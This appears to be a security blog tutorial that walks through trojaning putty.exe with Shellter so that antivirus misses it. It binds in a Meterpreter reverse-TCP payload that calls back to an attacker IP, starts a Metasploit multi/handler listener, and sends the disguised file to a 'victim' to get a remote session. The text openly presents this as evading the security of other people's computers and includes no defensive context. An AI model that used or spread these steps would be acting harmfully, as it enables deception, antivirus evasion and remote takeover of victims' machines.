Shellter-A Shellcode Injecting Tool
Hey Folks! Welcome back to learning more of what you love to do. That is, evading security of other computer or network. You know that there are various tools to assist you in this. One of such tools is Shellter.
Shellter is an active shellcode insertion tool. It effectively re-encodes payloads (here shellcode) to bypass anti-virus (AV) software. Shellter has proved to be the first dynamic infector for PE (Portable Executable) file format of Windows 32-bit applications.
To use Shellter, you can either create your own shellcode or create one from a framework such as Metasploit. Shellter embeds a 32-bit Windows application and the shellcode in such a way that it goes undetected by the AV software.
Let’s now discuss the steps to evade an AV software using Shellter in Kali Linux.
Download and Install Shellter
Download Shellter from here. You can download Shellter in Windows and then run it on Kali Linux using Wine. It runs Windows applications on Linux like operating systems. In this way, you can reduce the time required for installation.
You can install Shellter directly on Kali by using the following command:
apt-get install shellter
You can install Wine on Kali with the following command:
apt-get install wine32
When you open Shellter in Kali in wine mode, it prompts you to choose operation mode.
Choose Operation Mode
Select the mode as ‘a’. It stands for auto.
Now, you need to choose an executable file and copy it to the Shellter folder. This is required to be done to bind Shellter with a .exe file. In our case, we have copied the putty.exe file to the Shellter folder and bound it with the shellter.exe file.
When asked for PE Target, type the following command:
The binding process starts.
Press the Enter key to continue. You may see DisASM.dll file gets successfully created. Enable Stealth Mode. Then, you are prompted to enable stealth mode.
Type ‘y’ for yes.
The screen shows a list of payloads. It asks you whether you want to use a listed payload or custom.
Type ‘L’ to use from the listed payload.
Then, it asks you to select payload by index. You can select payload of your choice. In our case, we have selected 1 for Meterpreter_Reverse_TCP
Then you are asked to set LHOST and LPORT. Type the local host IP and the local port on which you want the session. In our case, we have set LHOST 192.168.1.109 [Attacker IP] LPORT as 4444.
When you press the Enter key, the payload information is displayed.
A warning message appears and as soon as the injection is verified, you are asked to press the Enter key to continue. When you press the Enter key.
In a new terminal type msfconsole to launch Metasploit framework and execute the following command
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <IP> set lport <port-no.> exploit
Send PuTTY.exe File to Victim’s Machine
When the victim clicks the putty.exe file which will appear as similar to original putty.exe and hence the victim will get trapped and we will get a meterpreter session.
As soon as the victim clicks on the putty.exe file, we will get meterpreter session as shown in the below image.
The meterpreter session opens and there you are ready to peek into the target system.
Author: Deepti Sharma is an information security enthusiast and a technical content writer. Contact Here